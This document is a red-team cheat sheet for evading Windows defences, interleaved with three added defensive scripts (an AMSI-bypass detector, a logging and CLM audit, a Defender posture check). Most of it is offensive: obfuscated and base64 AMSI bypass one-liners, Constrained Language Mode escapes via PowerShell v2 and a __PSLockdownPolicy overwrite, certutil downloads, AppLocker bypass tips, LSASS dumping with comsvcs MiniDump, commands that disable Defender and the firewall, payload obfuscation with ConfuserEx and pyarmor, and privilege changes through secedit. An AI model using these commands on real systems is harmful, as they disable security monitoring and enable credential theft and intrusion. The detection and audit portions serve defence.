Get all GPOs applied to a machine
System-wide transcription
Script Block logging
Antimalware Scan Interface (AMSI)
Constrained Language Mode (CLM) - Integrated with Applocker and WDAC (Device Guard)
Execution policy is not meant to be a security measure
powershell –executionpolicy bypass .\script.ps1
powershell –c <cmd>
powershell –enc
powershell.exe -executionpolicy bypass
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Fuck around with Invoke-Obfuscation until it doesn't get detected anymore
AMSI bypass with base64-encoded strings
function b64decode
{
param ($encoded)
$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded))
return $decoded
}
$1 = b64decode("U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5BbXNpVXRpbHM=")
$2 = b64decode("YW1zaUluaXRGYWlsZWQ=")
$3 = b64decode("Tm9uUHVibGljLFN0YXRpYw==")
[Ref].Assembly.GetType($1).GetField($2,$3).SetValue($null,$true)
Creating scripts that bypass amsi
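An added detection example, not part of the original notes: it scans PowerShell script block text (Event ID 4104) for the tells of the reflection-based AMSI bypass shown above. The sample script blocks are constructed inline so it runs offline; the commented Get-WinEvent line is the live form.

```powershell
function Test-AmsiBypassIndicators {
    param([string]$ScriptText)
    # One regex per tell-tale of the reflection bypass. The plain and Base64
    # variants from the notes trip the first five; the backtick/format-operator
    # obfuscation only leaves the weaker structural tells at the end.
    $indicators = [ordered]@{
        'AmsiUtils type name'     = 'AmsiUtils'
        'amsiInitFailed field'    = 'amsiInitFailed'
        'Base64 of AmsiUtils'     = 'U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5BbXNpVXRpbHM'
        'Reflection via [Ref]'    = '\[Ref\]\.Assembly\.GetType'
        'NonPublic,Static lookup' = 'NonPublic\s*,\s*Static'
        'Backtick-split member'   = '"[A-Za-z]+`[A-Za-z`]+"'
        'Format-operator string'  = '-[fF]\s*\('
    }
    $hits = @(foreach ($name in $indicators.Keys) {
        if ($ScriptText -match $indicators[$name]) { $name }
    })
    return ,$hits
}

# Constructed sample script blocks modelled on the three variants above, plus a benign one
$samples = @(
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue(`$null,`$true)",
    '$1 = b64decode("U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5BbXNpVXRpbHM="); [Ref].Assembly.GetType($1)',
    '( Get-varI`A`BLE ( (''1Q''+''2U'') +''zX'' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f(''Uti''+''l'') ))',
    'Get-ChildItem C:\Windows\Temp | Where-Object Name -like "*.log"'
)
foreach ($s in $samples) {
    $hits = Test-AmsiBypassIndicators $s
    '{0} hit(s): {1}' -f $hits.Count, ($hits -join '; ')
}

# Same test over live 4104 events (script block logging must be on); ScriptBlockText is Properties[2]
# Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} -MaxEvents 500 |
#   Where-Object { (Test-AmsiBypassIndicators $_.Properties[2].Value).Count -gt 0 } |
#   Select-Object TimeCreated, @{n='Text'; e={ $_.Properties[2].Value }}
```

The obfuscated variant only trips the two structural patterns, which is exactly why string matching alone is a weak control against it.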
$ExecutionContext.SessionState.LanguageMode
Escapes for Constrained Language Mode
Launch Powershell Version 2
Powershell.exe -Version 2
Overwrite __PSLockdownPolicy variable
If CLM is not implemented correctly and relies on the __PSLockdownPolicy environment variable:
Check the __PSLockdownPolicy value:
Value 4: CLM enabled
Value 8: CLM disabled
(Get-ItemProperty 'hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -name "__PSLockdownPolicy").__PSLockDownPolicy
Set the lockdown policy to 8 and check the language mode:
Set-ItemProperty 'hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -name "__PSLockdownPolicy" -Value 8
powershell.exe
$ExecutionContext.SessionState.LanguageMode
#Requires -RunAsAdministrator
If ( $ExecutionContext.SessionState.LanguageMode -eq "ConstrainedLanguage") {
Set-ItemProperty 'hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -name "__PSLockdownPolicy" -Value 8
Start-Process -File PowerShell.exe -Argument "-file $($myinvocation.mycommand.definition)"
Break
}
Write-Host $ExecutionContext.SessionState.LanguageMode
Start-Sleep -s 10
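An added audit script, not part of the original notes: it reports the state of the PowerShell controls listed at the top of the page (transcription, script block logging, CLM) and flags the __PSLockdownPolicy weakness and the PowerShell 2.0 downgrade described above. It assumes the standard Group Policy registry paths for PowerShell logging.

```powershell
$base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Reads one policy value, or $null when the key or value is absent
function Get-PolicyValue {
    param([string]$Key, [string]$Name)
    $item = Get-ItemProperty -Path $Key -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Get-PowerShellControlPosture {
    $f = [ordered]@{}

    # Script block logging (4104 events) and module logging (4103 events): 1 = on
    $f['ScriptBlockLogging'] = (Get-PolicyValue "$base\ScriptBlockLogging" 'EnableScriptBlockLogging') -eq 1
    $f['ModuleLogging']      = (Get-PolicyValue "$base\ModuleLogging" 'EnableModuleLogging') -eq 1

    # System-wide transcription: 1 = on; note where the transcripts are written
    $f['Transcription']      = (Get-PolicyValue "$base\Transcription" 'EnableTranscripting') -eq 1
    $f['TranscriptDir']      = Get-PolicyValue "$base\Transcription" 'OutputDirectory'

    # Language mode of this session; FullLanguage means CLM is not in effect here
    $f['LanguageMode']       = $ExecutionContext.SessionState.LanguageMode.ToString()

    # CLM driven by __PSLockdownPolicy is the weak form: any admin can set it to 8
    $lock = Get-PolicyValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' '__PSLockdownPolicy'
    $f['LockdownPolicyPresent'] = $null -ne $lock
    $f['LockdownPolicyValue']   = $lock

    # PowerShell 2.0 engine: the -Version 2 downgrade has no AMSI or script block logging.
    # Get-WindowsOptionalFeature needs elevation, so report 'unknown' rather than a false negative.
    $v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 -ErrorAction SilentlyContinue
    $f['PowerShellV2Enabled'] = if ($null -eq $v2) { 'unknown (run elevated)' } else { "$($v2.State)" -eq 'Enabled' }

    # Any false value, a present __PSLockdownPolicy, or V2 enabled is a finding
    return [pscustomobject]$f
}

Get-PowerShellControlPosture | Format-List
```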
PowerShdll: run PowerShell with DLLs only.
rundll32 PowerShdll,main -i
Download files with certutil
You cannot use iwr (Invoke-WebRequest) in constrained language mode, but you can use certutil:
certutil -urlcache -split -f <URL>
It is possible to execute scripts on the filesystem but you can't load them!
If AppLocker is present, enumerate it to find a directory that allows you to execute scripts.
AppLocker rules are split into 5 categories - Executable, Windows Installer, Script, Packaged App and DLLs, and each category can have its own enforcement (enforced, audit only, none).
AppLocker has a set of default allow rules such as, "allow everyone to execute anything within C:\Windows*" - the theory being that everything in C:\Windows is trusted and safe to execute.
The difficulty of bypassing AppLocker depends on the robustness of the rules that have been implemented. The default rule sets are quite trivial to bypass in a number of ways:
Executing untrusted code via trusted LOLBAS binaries.
Finding writeable directories within "trusted" paths.
By default, AppLocker is not even applied to Administrators.
Uploading into C:\Windows requires elevated privileges, but there are places like C:\Windows\Tasks that are writeable by standard users.
DLL enforcement is very rarely enabled due to the additional load it can put on a system and the amount of testing required to ensure nothing breaks.
Good repo for bypasses: https://github.com/api0cradle/UltimateAppLockerByPassList
Check if an AppLocker policy is running
Get-AppLockerPolicy -Effective
Enumerate the AppLocker policy
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Check the AppLocker policy in the registry
reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2
Get-DomainGPO -Identity *applocker*
Parse-PolFile "<GPCFILESYSPATH FROM GET-DOMAINGPO>\Machine\Registry.pol" | select ValueName, ValueData
Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard
If code integrity is enforced and PowerShell is running in Constrained Language Mode, use winrs instead of PSRemoting
runas /netonly /user:<DOMAIN>\<USER> cmd.exe
winrs -r:<PC NAME> cmd
.p7b is a signed policy
Check if there are any .xml files which did not get removed with the policy:
ls C:\Windows\system32\CodeIntegrity
For example dumping lsass:
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 708 C:\Users\Public\lsass.dmp full
dir C:\Users\Public\lsass.dmp
With non-admin privileges:
RunWithRegistryNonAdmin.bat
Use winrs instead of PSRemoting to evade system-wide transcription and deep script block logging
winrs -remote:server1 -u:<COMPUTERNAME>\<USER> -p:<PASS> hostname
Check if Windows Defender is running
Get-MpComputerStatus
Get-MpComputerStatus | Select RealTimeProtectionEnabled
Get info about Windows Defender
Find folders excluded from Windows Defender
Get-MpPreference | select Exclusion*
(Get-MpPreference).Exclusionpath
Set-MpPreference -ExclusionPath "<path>"
Get-DomainGPO -Identity *defender*
Parse-PolFile "<GPCFILESYSPATH FROM GET-DOMAINGPO>\Machine\Registry.pol" | select ValueName, ValueData
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
powershell.exe -c 'Set-MpPreference -DisableRealtimeMonitoring $true; Set-MpPreference -DisableIOAVProtection $true'
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
powershell.exe -c 'Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False'
netsh advfirewall firewall add rule name="Allow port" dir=in action=allow protocol=TCP localport=<PORT>
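An added posture check, not part of the original notes: it reports the Defender and firewall settings that the commands above turn off or widen (real-time protection, IOAV, exclusions, firewall profiles), so tampering is visible from the host itself. It assumes the built-in Defender and NetSecurity modules.

```powershell
function Get-DefenderPosture {
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference
    $fw     = Get-NetFirewallProfile

    $issues = [System.Collections.Generic.List[string]]::new()
    if (-not $status.RealTimeProtectionEnabled) { $issues.Add('Real-time protection is off') }
    if (-not $status.IoavProtectionEnabled)     { $issues.Add('IOAV (download/attachment) scanning is off') }
    if ($pref.DisableRealtimeMonitoring)        { $issues.Add('DisableRealtimeMonitoring is set') }
    if ($pref.DisableIOAVProtection)            { $issues.Add('DisableIOAVProtection is set') }

    # Exclusions are where Set-MpPreference -ExclusionPath lands; foreach over $null runs zero times
    foreach ($p in $pref.ExclusionPath)      { $issues.Add("Excluded path: $p") }
    foreach ($e in $pref.ExclusionExtension) { $issues.Add("Excluded extension: $e") }
    foreach ($x in $pref.ExclusionProcess)   { $issues.Add("Excluded process: $x") }

    # Set-NetFirewallProfile -Enabled False shows up here as Enabled=False on that profile
    foreach ($fwp in $fw) {
        if ($fwp.Enabled -ne 'True') { $issues.Add("Firewall profile $($fwp.Name) is not enabled") }
    }

    [pscustomobject]@{
        RealTimeProtection = $status.RealTimeProtectionEnabled
        IoavProtection     = $status.IoavProtectionEnabled
        FirewallProfiles   = ($fw | ForEach-Object { "$($_.Name)=$($_.Enabled)" }) -join ', '
        IssueCount         = $issues.Count
        Issues             = $issues
    }
}

Get-DefenderPosture | Format-List
```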
Obfuscate a binary with https://github.com/mkaring/ConfuserEx
Launch ConfuserEx
In the Project tab, select the Base Directory where the binary file is located.
In the Project tab, select the binary file that we want to obfuscate.
In the Settings tab, add the rules.
In the Settings tab, edit the rule and select the preset Normal.
In Protect tab click on the protect button.
We will find the new obfuscated binary in the Confused folder under the Base Directory.
If the script gets detected, use:
csc.exe /target:exe /out:C:\tools\defendercheck.exe C:\Tools\DefenderCheck\DefenderCheck\DefenderCheck\Program.cs
pyinstaller.exe --onefile .\CVE-2021-1675.py
pyarmor pack --clean -e "--onefile " .\CVE-2021-1675.py
Export the current user rights set by the group policies to a text file:
secedit /export /cfg secpolicy.inf /areas USER_RIGHTS
Change SeDebugPrivilege to S-1-5-32-544, the local Administrators group.
notepad.exe secpolicy.inf
Apply the new user rights set:
secedit /configure /db secedit.sdb /cfg secpolicy.inf /overwrite /areas USER_RIGHTS
Check privileges with whoami
If you do not have SeDebugPrivilege, run PsExec.exe -i cmd.exe
Enable SMB shares for local admin users
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "LocalAccountTokenFilterPolicy" /t REG_DWORD /d 1 /f
Get-service LanmanServer | restart-service -verbose